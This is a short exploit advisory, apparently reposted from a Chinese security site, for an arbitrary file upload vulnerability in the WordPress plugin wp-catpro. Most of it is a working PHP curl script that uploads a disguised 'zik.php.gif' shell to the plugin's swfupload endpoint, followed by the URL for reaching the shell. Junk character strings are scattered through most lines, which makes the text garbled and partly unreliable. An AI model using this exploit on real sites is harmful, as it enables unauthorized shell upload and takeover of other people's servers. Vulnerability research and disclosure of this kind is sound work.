WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

作者  => Zikou-16
# Q4 O; r7 y' b. |! D# n4 }邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
2 y2 i  y- p; y! R* Y( F4 g
#=> Exploit 信息:
------------------
. u; W8 M9 j% y! }7 w# 攻击者可以上传 file/shell.php.gif
( _8 r4 R, L; R1 B# ("jpg", "gif", "png")  // Allowed file extensions
$ V, Q7 I" k$ C) k# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
- j% f9 a, p; M; z2 @( e$ K/ e1 B
3 B* e* `, J7 s% v" |#=> Exploit
& B1 I( L; x: d3 |8 T" b) s-----------
4 ~( m" x# K5 H9 O, l/ b<?php

$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
! O% f. Y1 P8 S' {! Zcurl_setopt($ch, CURLOPT_POST, true);
' I; J9 g0 @/ V. k. U) b2 pcurl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
. ^/ V, q2 g0 E4 N+ I'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
) X1 ]7 T7 I$ Mcurl_close($ch);
" s6 c; S, w7 I) N- r- w% l9 F
print "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
  l+ P( G" z5 N<?php
phpinfo();
& |  z4 T' j, b?>